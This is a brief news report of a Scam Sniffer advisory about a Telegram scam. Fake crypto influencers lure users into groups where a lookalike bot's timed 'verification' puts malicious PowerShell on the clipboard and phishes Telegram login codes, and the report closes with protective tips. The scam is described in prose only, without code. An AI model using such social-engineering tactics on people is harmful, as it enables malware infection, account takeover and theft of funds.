Scam Sniffer: Please be aware of a new Telegram scam method where fake crypto KOLs spread malware

ChainCatcher news, Scam Sniffer has issued a security warning, revealing a new type of composite scam targeting cryptocurrency users. This scam has two main attack paths: system infection and account hijacking. The scammers first disguise themselves as well-known cryptocurrency KOLs, commenting on legitimate posts to lure users into joining so-called "exclusive investment" Telegram groups. Once users join the group, they will immediately receive a verification request from a fake bot named OfficiaISafeguardBot. These verifications are usually set with very short time windows, creating a sense of urgency.

On a technical level, the verification process injects malicious PowerShell code into the clipboard without the user's knowledge. Once executed, it will automatically download and run malware that can compromise system security. These malware have been flagged as malicious by VirusTotal and have recently caused multiple incidents of private key theft. Another attack method is to induce users to provide Telegram account-related information, including phone numbers, login verification codes, and two-step verification passwords, thereby gaining complete control over the user's Telegram account.

Scam Sniffer offers the following security recommendations:

1. Do not execute commands from unknown sources
2. Carefully verify the authenticity of official channels
3. Be vigilant about any verification requests with time pressure
4. Use hardware wallets to store cryptocurrency assets
5. Avoid running arbitrary code and installing unknown software
6. Never share Telegram verification codes and two-step verification passwords